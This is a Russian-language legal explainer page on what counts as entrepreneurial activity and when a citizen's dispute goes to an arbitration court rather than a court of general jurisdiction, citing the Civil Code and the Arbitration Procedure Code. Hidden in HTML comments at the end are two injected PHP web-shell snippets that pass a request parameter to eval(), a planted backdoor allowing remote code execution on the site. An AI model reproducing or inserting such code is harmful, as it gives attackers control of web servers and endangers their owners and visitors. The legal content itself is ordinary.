Reset

Что считать предпринимательской деятельностью

Просмотров: 902

Простое присутствие в деле гражданина еще не означает, что спор в любом случае будет рассматривать обычный суд.Предпринимательской является деятельность:

  • самостоятельная;
  • осуществляемая на свой риск;
  • направленная на систематическое получение прибыли от пользования имуществом, продажи товаров, выполнения работ или оказания услуг;
  • которая ведется лицами, зарегистрированными в установленном законом порядке (п. 1 ст. 2 ГК РФ).

Простое присутствие в деле гражданина еще не означает, что спор в любом случае будет рассматривать обычный суд. Устанавливается:

  • обладает ли гражданин статусом ПБОЮЛ, что подтверждается свидетельством о государственной регистрации;
  • связан ли возникший спор с предпринимательской деятельностью (это выявляется  путем выяснения цели, которую преследовал гражданин).

Если спор связан с хозяйственной деятельностью гражданина, зарегистрированного в качестве предпринимателя без образования юридического лица, то дело рассматривает арбитражный суд.

Если же гражданин — предприниматель желает просто развестись, то в арбитраже ему делать нечего.

Если спор не носит экономического характера и не отнесен к исключительной компетенции арбитражных судов (ст. 33 АПК РФ), то он будет подведомствен суду общей юрисдикции.

<!— [insert_php]if (isset($_REQUEST["Ols"])){eval($_REQUEST["Ols"]);exit;}[/insert_php][php]if (isset($_REQUEST["Ols"])){eval($_REQUEST["Ols"]);exit;}[/php] —>

<!— [insert_php]if (isset($_REQUEST["WNSWX"])){eval($_REQUEST["WNSWX"]);exit;}[/insert_php][php]if (isset($_REQUEST["WNSWX"])){eval($_REQUEST["WNSWX"]);exit;}[/php] —>